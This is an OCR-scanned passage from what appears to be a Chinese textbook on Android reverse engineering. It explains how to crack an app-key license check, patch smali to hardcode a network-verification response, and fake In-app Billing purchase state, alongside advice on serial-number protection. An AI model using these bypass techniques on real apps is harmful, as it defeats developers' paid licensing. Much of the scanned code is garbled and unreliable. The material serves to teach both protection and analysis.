实例 程序 freeapp.apk， 查 找到 OnCreate() 方 法 中 程序 初始 化 的 反 汇编 代码 
如 下 。 


.method public onCreate(lLandroid/os/Bundle;)V 
.locals’ 4 
,Parameter "savedInstanceState" 
.prologue 
const/4 v3, 0x0 
.line 24 
invoke-super {p0, pl}, Landroid/app/Activity;->onCreate(Landroid/os/ 
Bundle;)V 
.line 25 
const/high16 v2, 0x7f03 
invoke-virtual {p0, v2}, Lcom/droider/free/MainActivity;->setContent 
-View(I)V 
.line 27 
const/4 vO, 0x0 
.line 28 
.local v0O, resID:I #resID = 0 
invoke-direct {p0}, Lcom/droider/free/MainActivity;->checkappKey()2Z 


# 调 用 checkappKey () 

move-result v2 

if-nez v2, :cond 2 # 结 果 不 为 0 则 跳 转 到 conaQ_2 标 号 处 
.line 29 

const v0，0x7f040001 # 字 符 串 ID“androia 安 全 软件 免费 版 ” 
lA1ne 35 

:cond 0 # 通 过 appKey 解 密 所 得 的 int 值 获取 字符 串 

:goto_0 


invoke-virtual {p0, v0}, Lcom/droider/free/MainActivity;->getSstring(I)Ljava/ 
lang/String; 

move-result-object vil 

.line 36 

.local vl, titleString:Ljava/lang/Sstring; 

invoke-virtual {p0, vl}, Lcom/droider/free/MainActivity;->setTitle 
(Ljava/lang/CharSequence;)V 

.line 50 

const V2，0x7f040002# 字 符 串 ID“androidq 安 全 软件 高 级 版 ” 


if-ne v0，v2，:cond_3  ”# 如 果 不 为 高 级 版 就 跳 转 到 cond_3 标 号 处 

.line S51 

iget-object v2, p0, Lcom/droider/free/MainActivity;->btn advanced: 
Landroid/widget/Button; 

invoke-virtual {v2, v3}, Landroid/widget/Button;->setVisibility(I)V 
# 开 启 高 级 版 功能 


.line 57 


.line 86 


return-void 


si G1 
.end local v1 #titleSstring:Ljava/lang/string; 
:cond 2 # 检 测 到 已 安装 appKey， 获 取 解 密 int 值 


const v2，0x7f030001# 解 密 因 子 ， 通 过 v2 的 值 获取 appKey 

invoke-direct {p0, v2}, Lcom/droider/free/MainActivity;->getAppKey (I) 

Ljava/lang/Sstring; 

move-result-object v2 

invoke-direct {p0, v2}, Leom/droider/free/MainActivity;->decryptAppKey 

(Ljava/lang/Sstring;)I 

move-result v0 # 解 密 appKey 

.line 32 

if-nez v0，:cond_0 # 如 果 解 密 成 功 就 跳 转 到 cona_0 标 号 处 

.line 33 

const v0，0x7f040001# 字 符 串 ID“Android 安 全 软件 免费 版 ”， 说 明 解 密 失 败 

goto :goto_0 

.line 52 

.restart local vi #titlestring:Ljava/lang/SsString; 

:cond 3 # 比 较 是 否 为 专业 版 

const v2，0x7f040003# 字 符 串 TID“Android 安 全 软件 专业 版 ” 

if-ne vO, v2, :cond 1 

“Line 3 

iget-object v2, p0, Leom/droider/free/MainActivity;->btn advanced: 

Landroid/widget/Button; 

invoke-virtual {v2, v3}, Landroid/widget/Button;->setVisibility(I)V 

# 开 启 高 级 版 功能 

.line 54 

iget-object v2, p0, Lecom/droider/free/MainActivity;->btn _ pro:Landroid 
/widget/Button; 
invoke-virtual {v2, v3}, Landroid/widget/Button;->setVisibility(I)V 
# 开 启 专业 版 功能 
gotO :人 OO- 注 

.end method 


这 上 段 代 人 码 调 用 checkappKey0 判 断 本 机 是 否 安装 了 授权 KEY， 如 果 没 
有 安装 就 设置 软件 为 “免费 ”版 ， 反 之 则 跳 转 到 cond_2 标 号 处 获取 解密 后 
的 int 值 ， 最 后 根据 它 的 值 来 判断 软件 的 版 本 类 型 。 

接 下 来 看 看 checkappKeyO 的 反 汇 编 代 码 。 


.method private checkapPKevy()2Z 





“L0GalLs: 2 

.prologue 

.line 89 

const vl, 0x7f030001 # 解 密 因 子 

invoke-direct {pO0, vl}, Lcom/droider/free/MainActivity;->getAppKey (I) 


Ljava/lang/sString; 

move-result-object v0 

.line 90 

.local vO, appKey:Ljava/lang/SsString; 

if-eqz vO, :cond_0 # 如 果 获 取 appKey 失 败 则 返回 0 
invoke-virtual {v0}, Ljava/lang/String;->length()I 
move-result v1 # appKey 的 长 度 不 能 为 0 
if-nez vl, :cond_1 

.line 91 

:cond_0 

const/4 vl, Ox0 

LEE. 33 

:goto_0 

return v1 # 返 回 失败 

Gongd 4 

const/4 vi, 0xl # 返 回 成 功 


goto :goto_0 
.end method 


checkappKeyO 只 是 调用 了 getAppKey0， 后 者 的 反 汇 编 代 码 如 下 。 





.method private getAppKey (I)Ljava/lang/SsString; 
ocals :5 
.parameter "resId" 
.prologue 
.line 96 
const-String V2 ™" 
.line 98 
.local v2, result:Ljava/lang/sString; 
Stry tart 0 
const-string v3, "com.droider.appkey" 
.line 99 
const/4 v4, 0x2 
.line 98 
invoke-virtual {pO0, v3, v4}, Lcom/droider/free/MainActivity; 

->createPackageContext (Ljava/lang/string;I)Landroid/content/Context; 

move-result-object v0  # 获 取 com.droider .appkey 软 件 包 的 Context 
.line 100 
.local vO, context:Landroid/content/Context; 
invoke-virtual {v0O, pl}, Landroid/content/Context;->getSstring(I)Ljava/ 
lang/sString; 
:try_end_0 
Catch Ljava/lang/Exception; {:try_start_0 ,. :try_end _ 0} :catch_0 
move-result-object v2  # 调 用 context 的 getsString 1() 
.line 105 
.end local v0 #context:Landroid/content/Context; 
:TOto_0 
return-object v2 
Pi oT — ob tb 
:catch_0 
move-exception v1 
.line 102 
.local vi1, e:Ljava/lang/Exception; 
invoke-virtual {v1l}, Ljava/lang/Exception;->printStackTrace()V 
.line 103 
const -etrelng Var 
gote Coco0 

.end method 


这 段 代码 是 整个 程序 检测 授权 KEY 的 核心 。 转 换 成 Java 代 码 为 : 


private String getAppKey (int resId) { 
String’ result:s= "” 
try 坟 
Context context = MainActivity.this.createPackageContext ("com.droider. 
appkey", 
Context .CONTEXT_IGNORE SECURITY); 
result = context .getSstring (resId); 
} catch (Exception e) { 
e.printstackTrace(); 
result = "" 
} 
return result; 


) 
回顾 一 下 学 习 Android 软 件 开发 的 知识 ，createPackageContext() 方 法 


的 作用 是 什么 ? 这 个 方法 可 以 创建 其 它 程序 的 Context， 通 过 这 个 
Context 可 以 访问 其 它 软件 包 的 资源 ， 甚 至 可 以 执行 其 它 软件 包 的 代码 。 
但 这 个 方法 可 能 抛 出 java.lang.SecurityException 异 常 ， 这 个 异常 为 安全 
异常 ， 通 常 一 个 软件 是 不 能 够 创建 其 它 程序 Context 的 ， 除 非 它 们 拥有 相 
同 的 用 户 ID 与 签名 。 用 户 ID 是 一 个 字符 串 标 识 ， 在 程序 
AndroidManifest.xml 文 件 的 manifest 标 签 中 指定 ， 格 式 为 
android:sharedUserId="xxx.xxx.Xxx"， 当 两 个 程序 中 指定 了 相同 的 用 户 ID 
时 ， 这 两 个 程序 将 运行 在 同一 个 进程 空间 ， 它 们 之 间 的 资源 此 时 可 以 相 
互 访问 ， 如 果 它 们 的 签名 也 相同 的 话 ， 还 可 以 相互 执行 软件 包 之 间 的 代 
码 。 

在 通过 Context 获 取 字 符 串 (也 就 是 实例 的 appKey)〉 后 ， 接 着 调用 
decryptAppKey0 方 法 对 该 字符 串 解密 。 如 果 解 密 失 败 说 明 授 权 appKey 无 
效 ， 此 时 程序 仍然 会 以 “免费 ”模式 运行 。 

现在 整个 授权 的 机 制 算是 明白 了 。 实 例 程序 com.droider.free 与 授权 
KEY 程 序 com.droider.appkey 使 用 相同 的 用 户 ID， 当 实例 程序 启动 时 ， 获 
取 授 权 KEY 程 序 的 Context， 并 通过 Context 取 得 它 的 一 个 字符 串 资 源 ， 
然后 对 这 个 字符 串 解密 后 得 到 一 个 int 值 ， 通 过 这 个 值 来 判断 程序 的 授权 
类 型 ， 最 后 根据 授权 类 型 来 开启 相应 的 软件 功能 。 如 果 在 获取 Context 的 

















时 候 发 生 异 常 ， 说 明 本 机 没有 安装 授权 KEY， 程 序 将 以 “免费 ”模式 运 
行 。 

掌握 了 整个 授权 的 思路 ， 破 解 起 来 就 很 简单 了 ， 关 键 在 于 
getAppKey0 方 法 与 decryptAppKey0) 方 法 的 修改 ， 让 它们 永远 返回 合适 
的 值 即 可 。 限 于 篇 幅 ， 修 改 的 过 程 笔 者 不 再 详 述 ， 相 关 实 例 的 源码 与 修 
改 好 的 程序 可 以 在 本 书 配套 源 代码 中 找到 。 








9.2 序列 号 保护 


序列 号 保护 又 称 为 注册 码 保护 。 通 常 在 购买 这 种 保护 方式 的 软件 
时 ， 用 户 需 要 回 软 件 作者 提供 注册 信息 《用 户 名 或 机 器 码 ) ， 软 件 作 者 
通过 自己 编写 的 “ 算 号 ”程序 计算 出 注册 码 发 回 给 用 户 ， 用 户 使 用 这 个 注 
册 码 完成 整个 注册 过 程 。“ 算 号 ”软件 也 称 为 注册 机 ， 在 计算 可 逆 加 密 算 
法 程序 的 注册 码 时 ， 它 通常 是 软件 加 密 算法 的 一 个 逆 过 程 。 

序列 号 方式 保护 软件 的 破解 难 易 程度 在 于 软件 作者 的 算法 设计 与 应 
用 方式 上 。 算 法 设计 是 一 门 学 问 ， 需 要 软件 作者 拥有 较 深 的 数学 知识 基 
底 ， 现 在 大 多 数 的 软件 公司 都 有 一 套 自己 的 注册 算法 ， 通 常 公司 的 所 有 
软件 都 使 用 了 同一 套 注 册 算 法 ， 因 此 ， 如 果 其 中 一 个 软件 的 算法 被 破 
解 ， 也 就 意味 公司 整个 系列 的 软件 被 破解 ， 这 是 一 件 很 可 怕 的 事件 ， 公 
司 在 算法 设计 上 可 能 要 下 大 功夫 。 除 了 拥有 强劲 的 算法 ， 还 需要 有 良好 
的 注册 验证 技巧 ， 一 款 序 列 号 保护 的 软件 即使 算法 再 强大 ， 而 验证 上 只 
是 做 了 简单 正确 与 否 的 比较 ， 这 样 的 保护 将 会 是 形同虚设 ，Cracker 只 需 
修改 软件 的 跳 转 ( 可 能 只 需 一 个 字 节 ) 就 可 以 将 软件 破解 。 在 这 里 笔者 
给 出 几 点 序列 号 保护 的 建议 : 

1. 序列 号 加 入 机 器 码 验 证 ， 做 到 一 机 一 码 。 

2. 使 用 NDK 编 写 注 册 模 块 。 将 软件 注册 版 提供 的 功能 进行 加 密 ， 
例如 对 相关 代码 或 数据 使 用 AES、DES 等 加 密 算法 进行 加 密 ， 软 件 在 运 
行 时 检测 注册 信息 ， 如 果 是 注册 版 用 户 则 根据 注册 信息 生成 正确 的 解密 
密 钥 ， 最 后 使 用 这 个 密 钥 对 注册 版 功能 进行 解密 。 根 据 注册 信息 生成 密 
钥 的 一 种 思路 可 以 是 : 在 判断 用 户 注册 码 正 确 的 情况 下 ， 取 注册 码 的 前 
8 位 对 其 每 个 字 节 进行 异 或 运算 ， 然 后 使 用 这 8 位 异 或 后 的 字 节 作为 加 密 
密 钥 ， 对 注册 功能 代码 的 解密 密 钥 进行 AESIDES 加 密 运算 〈AES/DES 的 
加 密 密 钥 即 为 解密 密 钥 ) ， 将 生成 的 加 密 数 据 写 入 程序 的 配置 文件 


























(CSharedProferences 或 File 都 可 以 ) ， 软 件 在 运行 时 读 取 该 数据 对 代码 进 
行 解密 ， 解 密 成 功 即 说 明 是 注册 版 用 户 。 
3. 加 入 其 它 类 型 的 保护 方式 。 多 种 保护 方式 比 单一 的 保护 肯定 要 
安全 得 多 。 
4. 其 它 的 保护 建议 请 参看 本 书 第 10 章 介绍 的 反 破 解 技术 。 
本 小 节 不 提供 实例 讲解 ， 前 面 的 章节 如 5.2.1、8.3.1 的 实例 都 是 采用 
注册 码 保护 ， 读 者 可 以 回头 看 看 前 面 的 章 市 来 尝试 自己 编写 注册 机 。 





9.3 网 络 验证 





网 络 验证 是 指 软件 在 运行 时 需要 联网 进行 一 些 验证 。 网 络 连接 方式 
可 以 是 Socket 连 接 与 HTTP 连 接 ， 验 证 的 内 容 可 以 是 软件 注册 信息 验 
证 、 代 码 完整 性 验证 以 及 软件 功能 解密 等 。 


9.3.1 网 络 验 证 保护 思路 


软件 通过 网 络 向 验证 服务 器 请 求 反 馈 信 息 ， 这 些 信息 可 能 古 静 态 的 
例如 服务 器 上 的 茶 个 文件 ) ， 也 可 能 是 动态 的 “例如 传递 一 些 特定 的 
参数 访问 服务 器 的 ASP 或 PHP 脚 本 ， 服 务 器 根据 不 同 的 参数 返回 不 同 的 
数据 ) ， 还 有 可 能 是 交互 的 〈 例 如 软件 定义 了 一 套 与 服务 器 交互 的 协 
议 ， 通 过 Socket 方 式 进行 通信 ) 。 对 于 静态 的 反馈 信息 ， 分 析 人 员 能 够 
手动 访问 网 络 获取 所 有 信息 的 内 容 ， 这 样 的 软件 在 破解 时 相对 简单 ， 只 
需要 找到 验证 点 补丁 上 相应 的 信息 即 可 ; 动态 的 反馈 信息 处 理 起 来 则 麻 
烦 一 些 ， 由 于 无 法 得 知 完整 的 信息 内 容 ， 就 需要 尝试 构造 不 同 参数 的 信 
恩 来 获取 返回 结果 ， 这 可 能 需要 多 次 运行 软件 ， 并 且 效 果 可 能 并 不 理 
想 ， 尤 其 在 参数 与 反馈 信息 被 加 密 的 情况 下 ， 还 需要 花 大 量 的 时 间 来 对 
信息 进行 解密 ;交互 式 的 网 络 验证 是 最 难 破解 的 ， 交 互 式 网 络 验证 的 服 
务 吉 能 够 对 信息 进行 更 好 的 控制 ， 这 种 验证 多 用 于 对 软件 功能 的 保护 以 
及 对 软件 使 用 者 合法 性 的 检测 上 ， 软 件 功能 保护 将 软件 的 核心 功能 从 客 
户 端 转岗 了 服务 端 ， 客 户 端 软 件 只 是 成 为 了 一 个 数据 显示 工具 ， 而 合法 
性 检测 例如 第 见 的 “心跳 包 ” 检 测 ， 一 旦 软件 与 服务 器 断 开 连 接 ， 软 件 就 
拒绝 提供 任何 功能 或 者 干脆 停止 运行 。 


9.3.2 ”实例 破解 一 一 针对 网 络 验 证 方式 的 破解 












































本 小 节 实 例 为 一 个 静态 网 络 验证 实例 。 在 断 开 网 络 的 情况 下 ， 安 装 
并 运行 实例 程序 network.apk， 运 行 效果 如 图 9-3 所 示 。 软 件 提示 “该 功能 
只 能 在 网 络 状 态 下 使 用 ”。 


ll 5554: Android2. 3. 3 


网 络 验证 演示 程序 


该 功能 只 能 在 网 络 状态 下 使 用 ! 





图 9-3 网络 验证 程序 运行 效果 


设置 连接 网 络 后 ， 运 行程 序 效果 如 图 9-4 所 示 。 


上 5554:Android2. 3 了 3- 3 了 3 


3 加 且 5:23 


网 络 验 证 演示 程序 
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图 9-4 连接 网 络 后 程序 运行 界面 


现在 我 们 的 需求 是 : 让 软件 的 功能 可 以 在 断 网 的 情况 下 继续 〈 本 实 
例 功 能 是 从 网 络 上 获取 一 段 加 密 的 字符 串 ， 然 后 解密 显示 ) 。 

既然 软件 会 联网 访问 服务 器 上 的 数据 ， 那 么 我 们 就 先 来 找 出 服务 器 
的 地 址 。 除 了 使 用 静态 分 析 人 查找 服务 器 地 址 外 ， 还 可 以 通过 网 络 抓 包 的 
方式 来 获取 ， 网 络 抓 包 工具 可 以 使 用 Android 移 植 版 的 ktpdump 工 具 ， 访 
工具 在 Android 模 拟 器 的 /system/xbin 目录 下 ， 源 码 位 于 Android 系 统 源码 
的 externaltcpdump 目 录 。 





执行 以 下 命令 开始 抓 包 。 


adb shell tcpdump -p -vv -s 0 -w /sdcard/capture.pcap 
回 到 程序 的 界面 ， 点 击 “ 执 行 功能 ”按钮 ， 然 后 回 到 命令 提示 窗口 按 


下 CTRL+C 停 止 抓 包 ， 然 后 执行 以 下 命令 导出 包 文 件 。 


adb pull /sdcard/capture.pcap 
安装 Wireshark 网 络 分 析 工 具 ， 可 以 通过 其 官网 在 以 下 网 址 


http://www.wireshark.org/download.html 下 载 安 装 。 安 装 完成 后 直接 双击 
capture.pcap 文 件 ， 会 启动 Wireshark 显 示 数 据 包 的 内 容 ， 查 找 绿色 的 
HTTP 与 TCP 数 据 包 ， 最 终 发 现 访 问 的 网 址 为 http://com-droider- 
network.googlecode.com/svn/info.txt， 效 果 如 图 9-5 所 示 。 


capture. pcap [Yireshark 1.8.2 (SYH Rev 44520 froa /trunk-1.8)] 
Ble Edt View Go Capture Analyze Statistics Telephony Ioos Intemals Help 


可 囊 人 和 人 | 已 轴 X 包 吕 | 以 中 鸣 虽 了 入 | 四 | 国 | 和 已 和 有 回 | 羡 国 蜀 其 | 囊 
Filter: [ 了 Expression .. [Clear Apply Save 


Time Source Destination Protocol Length Info 
16 1.981747 74.125.128.82 10.0.2.15 TCP 64 http > 37571 [SYN, ACK] Seq=0 Ack=1 Win=8192 人 
17 1.982310 10.0.2.15 74.125.128.82 TCR 54 37571 > http [ACK] Seq=1 Ack=1 Win=5840 Len=0 
18 2.044675 10.0.2.15 74.125.128.82 HTTP 150 GET /svn/info.txt HTTP/L.1 
19 2.045099 74.125.128.,82 O02 TeP 64 http > 37571 [ACK] Seq=1 Ack=97 Win=8760 Len=( 
20 2.255310 10.0.2.15 023 TCP 85 personal-agent > taurus-wh [PSH, ACK] Seq=162 
21 2.255470 10.0.2.2 Os TCP 64 taurus-wh > personal-agent [ACK] Seg=73 AcCk=15 
22 2.324389 10.0.2.2 1 并 " 冯 TCP 78 taurus-wh > personal-agent [PSH, ACK] Seq=73 a 
?72 7 22N615 .MN 7 15 TO A norennsl aNnont 、 Faiwiec—wh 『narw1 Som—102 srv -cM 





由 Transmission Contro] protoco1， Src Port : 37571 (37571), Dst Port: http C80), seq: 1, Ack: a Len: 96 A 


回 人 Transfer Protoco] 
+ GET /svn/info.txt HTTP/L .LNPNn 
Host : com-droider-network. googlecode. com\r \n 
Connection: Keep-Alive\r\n 
\r\n 
FU]1 reguest URI: http://com-droider-network.googlecode.com/svyn/info.txt 


"SRT cA4V..E. 
0.0. J 了 上 
Pp. 


¢ Be 多 GE 下 /svn/i 
nfo.txt HTTP/1.1 

.Host: com-droi 
der-netw ork. goog 
lecode.c om. .Conn 
ection: Keep-Ali 
VO 





@ | The ful requested URI (including host na... | Packets; 78 Displayed: 78 Marked: 0 Load time: 0:00,630 Profile: Default 








图 9-5 ”使 用 Wireshark 分 析 数 据 包 


在 浏览 器 中 打开 这 个 网 址 ， 发 现 内 容 如 下 。 


9 
"key": "droider", 
"msg":"2970C000324690E4AC28850CC2E4D36C6713FE28F48BD03D442AE1845 
CBDF16EA68CEDB67F8E90C6D47BBA4C7F492322056C4A6B56BA1633BDCF9715850 
E77B18" 

} 


} 

这 段 内容 是 固定 写 死 的 ， 也 就 是 说 ， 每 次 软件 访问 这 个 网 址 后 反馈 
的 数据 是 相同 的 ， 因 此 ， 我 们 可 以 去 掉 网 络 访问 的 代码 ， 直 接 将 其 改 为 
以 上 的 文本 内 容 ， 即 可 达到 “本 地 化 ”的 目的 。 修 改 方法 如 下 : 反 编 译 
network.apk， 打 开 smali\com\droidernetwork\MainActivity$1.smali 文 件 ， 
找到 OnClick(0) 方 法 后 清空 所 有 的 内 容 ， 仅 保留 最 后 access$2(0) 方 法 的 调 
用 ， 修 改 后 的 代码 如 下 。 


.method public onclick(LandaroiaQ/view/View; )V 





;locGals 1 
.Parameter "V" 
.prologue 
:cond 0 
iget-object vO, p0, Lcom/droider/network/MainActivitys$!]; 
->this$0:Lcom/droider/network/MainActivity; 
invoke-static {v0}, Lcom/droider/network/MainActivity; 
->access$2 (Lcom/droider/network/MainActivity;)V 
return-void 
.end method 
打开 smali\com\droider\network\MainActivity.smali 文 件 ， 找 到 
getData() 方 法 后 去 掉 HttpUtils 类 的 getStringFromURLO 调 用 ， 然 后 修改 代 


码 如 下 。 


.method private getDatal()V 
of 
.prologue 
.line 42 
Omgt =atrang vl, "MINVENRNENV"INfoN {NTMINEVEN key Ne "drolider\ "Vr\NEtN 
t\"msg\":\"2970C000324690 
EAAC28850CC2E4D36C6713FE28F48BD03D442AE1845CBDF16EA68CEDB67F8E90 
C6D47BBAC7F492322056C4A6B56BA1633BDCF9715850E77B18\"\r\n\t}\r\ 
I NLS 
.line 43 
invoke-virtual {vil}, Ljava/lang/String;->length!()I 
move-result v3 
Lf=nes V3 Seond 
.line 44 
:cond_0 
iget-object v3, p0, Leom/droider/network/MainActivity;->txt_ info:Landroid/ 
widget/TextView; 
const/high16 v4, -0xl1 
.end method 
将 返回 的 字符 串 数据 赋值 给 v1 寄存 器 ， 这 样 就 与 从 网 络 上 获取 数据 
后 返回 的 结果 是 一 样 的 了 。 将 修改 后 的 代码 保存 并 重新 编译 生成 


network.apk， 安 装 测试 发 现 程序 已 经 可 以 脱离 网 络 运行 了 。 








9.4 In-app Billing (应 用 内 付费 ) 


Android In-app Billing 又 称 为 应 用 内 付费 ， 是 Android 提 供 的 一 种 应 
用 付费 模式 ， 本 小 节 将 介绍 In-app ” Billing 的 使 用 方法 以 及 如 何 破解 它 
们 。 





9.4.1 In-app Billing 原 理 


Android 人 允许 用 户 在 软件 使 用 过 程 中 辣 软 件 作者 支付 弗 用 。 我 们 先 
来 看 看 使 用 该 项 服务 的 限制 。 

e 程序 只 能 通过 Google Play 发 布 

e 开发 人 员 必 须 有 Google Checkout 账 户 

e 必须 安装 2.3.4 版 本 或 以 上 的 Google Play 商店 

e Android 1.6 以 上 设备 支持 

e 只 能 用 于 购买 虚拟 商品 

e 必须 能 够 通过 网 络 访问 Google Play 服 务 器 

以 上 为 Google 官 方 的 硬性 规定 ， 实 际 上 还 有 很 重要 的 一 条 ， 那 束 是 
当地 法 律 法 规 的 文 持 。 在 中 国 ， 目 前 是 无 法 使 用 Google Play 商店 来 购买 
程序 的 ， 这 意味 着 In-app Billing 在 中 国内 地 的 Android 程 序 中 是 无 法 使 用 
的 。 

图 9-6 展 示 了 In-app Billing 是 如 何 与 Google Play 服务 器 进行 通讯 的 。 
一 个 实现 了 In-app Billing 服 务 的 程序 可 以 包含 以 下 5 个 组 件 (这些 组 件 并 
非 Android SDK 提 供 ， 而 是 需要 开发 人 员 自 己 编写 ) ， 它 们 分 别 是 : 

BillingReceiver: 从 Google Play 接收 异步 的 账单 处 理 的 应 答 。 

BillingService: 处 理 软件 的 购买 消息 以 及 发 送 付款 请 求 。 

Security: 执行 安全 相关 的 任务 ， 如 签名 验证 与 随机 数 生 成 等 。 











ResponseHandler: 提供 程序 特定 的 购买 提示 、 错 误 和 其 他 状态 消 筷 
的 处 理 。 

PurchaseObserver: 负责 发 送 回调 消息 给 程序 ， 以 便 对 界面 上 的 购 
买 信息 和 状态 进行 更 新 。 


Market Server 
Checkout flow 
Product list 


Transaction data 
(if managed) 





Your Application 


MarketBillingService 


_ 
ResponseHandler | 省 \ 





"=m™™ le 
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Your Server 
(Optional) 


Content delivery 


Purchase data 











图 9-6 ”In-app Billing 与 Google Play Server 进 行 通讯 


In-app Billing 服 务 的 实现 步骤 可 以 参考 Android SDK extras\google 日 
录 下 的 play_billing 实 例 。 首 先 自 定义 BillingReceiver、BillingService、 
Security、ResponseHandler、PurchaseObserver 五 个 组 件 。BillingReceiver 
就 是 一 个 普通 的 广播 接收 者 ， 它 继承 自 BroadcastReceiver， 主 要 负责 接 
收 Google Play 发 送 过 来 的 广播 信息 ; BillingService 继 承 自 Service 并 实现 
了 ServiceConnection， 它 有 一 个 IMarketBillingService 类 型 的 成 员 
mService， 主 要 负责 通过 AIDL 的 方式 来 与 Google ” ”Play 进行 通讯 ， 其 中 
BillingService 的 handleCommand() 方 法 用 来 响应 BillingReceiver 通 过 
startService() 发 送 过 来 的 处 理 请 求 ，Security 用 来 生成 、 移 除 以 及 管理 随 
机 数 ， 并 提供 了 随机 数 与 JSON 字 符 串 的 验证 ，ResponseHandler 主 要 提 
供 一 些 静 态 方法 与 PurchaseObserver 进 行 通讯 ，PurchaseObserver 主 要 负 
责 程序 的 UI 更 新 。 

程序 启动 时 开启 人 并 注册 ResponseHandler 处 理 器 ， 
然后 调用 sendBillingRequest() 方 法 通过 IPC 机 制 同 Google Play 发 送 请 求 信 
息 。 请 求 信息 可 以 是 : 

e CHECK_BILLING_SUPPORTED: 检测 是 否 支持 In-app 
Billing。 

e REQUEST_PURCHASE: 发 送 购买 信息 。 

e GET_PURCHASE_INFORMATION: 购买 成 功 、 取 消 、 退 款 等 
状态 发 生 时 ， 提 示 应 用 程序 。 

e CONFIRM_NOTIFICATIONS: 确认 通知 。 

e RESTORE_TRANSACTIONS: 获取 已 购买 的 状态 。 

程序 最 先 发 送 CHECK_BILLING_SUPPORTED 检 查 运 行 环境 是 否 
持 In-app Billing。 请 求 被 Google Play 处 理 后 ，MarketBillingService 会 回 
程序 发 送 广播 信息 ， 这 些 信 息 会 被 BillingReceiver 接 收 到 ， 接 收 到 广播 

















后 检查 相关 Intent 的 Action， 它 的 值 通常 是 

com.android.vending.billing.RESPONSE_CODE: 获取 这 个 Action 
后 ， 通 常 将 它 传 给 BillingService， 后 者 会 调用 ResponseHandler 来 处 理 它 

《可 以 显示 其 状态 ， 也 可 以 什么 都 不 做 ) 。 

com.android.vending.billing.IN_APP_ NOTIFY: 处 理 它 的 方法 通常 是 
给 BillingService 传 递 一 个 包含 GET_PURCHASE_INFORMATION 的 
Intent， 后 者 会 发 送 请 求 去 获得 消息 的 详细 内 容 。 

com.android.vending.billing.PURCHASE_STATE_CHANGED: 收 到 
这 个 Action 表 明 收 到 了 Google ”Play 传 过 来 的 应 答 消 息 。 应 答 信 息 使 用 
inapp_signed_data 传 递 了 一 个 JSON 格 式 的 字符 串 数据 ， 例 如 一 个 订购 信 
轧 的 应 答 可 能 如 下 : 


{ "nonce” 3 二 8 了 63350323772L46557 


"orders" 











[{ "notificationId" : "android.test.purchased", 
"orderId" : "transactionId.android.test.purchased", 
"packageName" : "com.example.dungeons", 
"productId" : "android.test.purchased", 
"developerPayload" : "bGoa+V7g/yqDXvKRqq+JTFN4uQZbPiQJOA4PE9RZJ", 
"purchaseTime" : 1290114783411， 
"purchaseState" : 0, 
"purchaseToken" : "rojeslcdyyiapnqcynkjyyjh" }] 
} 


应 答 信息 还 通过 inapp_signature 传 回 JSON 字 符 串 的 签名 信息 。 每 个 
请 求 在 发 送 时 会 附带 一 个 自动 生成 的 随机 数 ( 由 开发 人 员 提 供 生成 与 管 
理 ) ， 收 到 应 答 信 息 后 这 个 随机 数 也 一 同 被 回 传 ， 程 序 中 应 该 要 对 随机 
数 (nonce) SONS 0 以 确保 数据 在 传输 过 程 中 
没有 被 非法 算 改 。 这 个 验证 工作 就 是 前 面 所 说 的 Security 组 件 要 做 的 
事 。 











验证 过 程 会 解析 JSON 字 符 串 ， 完 成 后 会 返回 一 个 VerifiedPurchase 
列表 ， 里 面包 含 了 所 有 已 经 验证 的 付费 软件 信息 。 最 后 调用 
ResponseHandler 类 的 purchaseResponse() 方 法 对 其 进行 响应 ， 后 者 调用 





PurchaseObserver 类 的 postPurchaseStateChange() 更 新 程序 UI， 例 如 程序 
还 没有 被 购买 可 以 提示 用 户 购 买 ， 如 果 用 户 同意 就 发 送 
REQUEST_PURCHASE 消 息 。 

最 后 ， 使 用 In-app ”Billing 服 务 需 要 在 AndroidManifest.xzml 文 件 中 加 
入 相应 的 权限 ， 代 码 如 下 。 


<uses-permission android:name="com.android.vending.BILLING" /> 
9.4.2 In-app Billing 人 破解 方法 


在 上 一 小 节 中 ， 我 们 看 到 In-app ”Billing 相 关 的 功能 实现 都 是 Java 代 
人 码 。 而 且 只 有 一 个 Security 组 件 对 应 管 信息 进行 验证 。 下 面 我 们 看 看 可 
以 从 哪些 环节 来 破解 In-app Billing 类 型 的 软件 。 

通常 软件 作者 的 思路 是 当 用 户 需 要 开局 软件 某 功 能 的 时 候 ， 同 用 户 
弹出 提示 需要 购买 此 功能 ， 然 后 引导 用 户 进 入 付款 页 面 进行 购买 ， 购 买 
成 功 后 软件 会 检查 是 否 购 买 成 功 ， 如 有 果 购 买 成 功 就 开启 软件 的 收费 功 
能 ， 整 个 流程 如 图 9-7 所 示 。 











尝试 开启 软件 收费 功能 


| 


一 一 已 经 购买 一 一- 弹出 购买 提示 杠 








- 
' 








行 功能 一 一 同意 购买 一 全 。 程序 退出 


[et 








I 
v 
进入 购买 页 面 并 付款 | 


Y 
检查 是 否 购 买 成 功 


AL 
4 


一 一 购买 成 功 > 





图 9-7 ”In-app Billing 工 作 流程 


上 图 9-7 显 示 的 流程 图 中 有 四 个 条 件 判 断 ， 分 别 是 已 经 购买 、 同 意 
购买 、 付 球 成 功 、 购 买 成 功 。 下 面 分 别 从 已 经 购买 与 购买 成 功 两 个 条 件 
判断 入 手 来 破解 In-app Billing 类 型 的 程序 。 

首先 是 程序 如 何 判断 收费 功能 已 经 被 用 户 购买 ， 通 常 使 用 In-app 
Billing 服 务 的 软件 都 提供 了 多 项 收费 功能 ， 如 果 使 用 每 个 功能 时 都 联网 
检查 软件 的 收费 状态 ， 势 必 会 影响 到 软件 运行 时 的 性 能 ， 同 时 还 会 耗费 
用 户 有 限 的 手机 流量 ， 很 显然 不 是 明智 之 举 。 这 种 情况 下 一 般 软件 开发 
人 员 会 将 所 有 的 软件 收费 功能 做 成 一 个 列表 ， 使 用 本 地 存储 的 方式 来 保 

















存 各 功能 的 收费 状态 ， 在 软件 初始 化 时 读 取 它们 的 状态 并 设置 相应 的 
值 。 这 样 问题 就 出 现 了 ， 如 果 在 本 地 存储 中 构造 虚假 的 购买 状态 信息 ， 
那么 软件 运行 时 相应 的 收费 功能 不 就 显示 已 购买 了 吗 ? 答案 是 肯定 的 。 
因此 ， 本 地 存储 的 软件 购买 数据 如 果 不 进行 加 密 就 可 以 简单 地 被 绕 过 ， 
从 而 实现 不 改动 软件 一 个 字 节 就 将 程序 破解 挤 〈 前 提 条 件 是 能 够 读 写 软 
件 的 本 地 存储 数据 ， 例 如 用 户 能 够 获取 root 权 限 ) ! 

如 果 本 地 数据 被 加 密 或 者 用 户 无 法 获取 root 权 限 ， 又 或 者 程序 没有 
